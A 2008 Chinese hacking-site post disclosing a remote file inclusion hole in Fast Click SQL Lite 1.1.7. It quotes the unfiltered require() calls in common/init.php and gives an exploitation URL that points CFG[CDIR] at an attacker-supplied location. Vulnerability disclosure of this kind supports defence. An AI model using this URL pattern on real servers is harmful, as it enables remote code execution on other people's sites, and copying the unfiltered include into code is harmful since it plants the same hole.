黑客防线,在攻与防的对立统一中寻求突破!2001年创刊的黑客技术专业刊物!

设为首页
收藏本站
联系我们
网站导航

黑客文章 - 脚本漏洞 - 浏览 - Fast CLick SQL Lite 1.1.7远程文件包含漏洞

Fast CLick SQL Lite 1.1.7远程文件包含漏洞

黑客 发布日期:2008-10-20 0:03:46 共有 248 人次浏览
Fast CLick SQL Lite 1.1.7远程文件包含漏洞
下载地址http://www.ftrsoft.com/downloads.html
代码: common/init.php

        require($CFG['CDIR'].'/global.php');  
//这里$CFG['CDIR']没有进行过滤
        require($CFG['CDIR'].'/sql.php');

利用方法http://localhost/[path]/common/init.php?CFG[CDIR]=[hacker]



所属分类: 脚本漏洞     网摘收藏: Google 雅虎 百度 POCO 365key 和讯 天极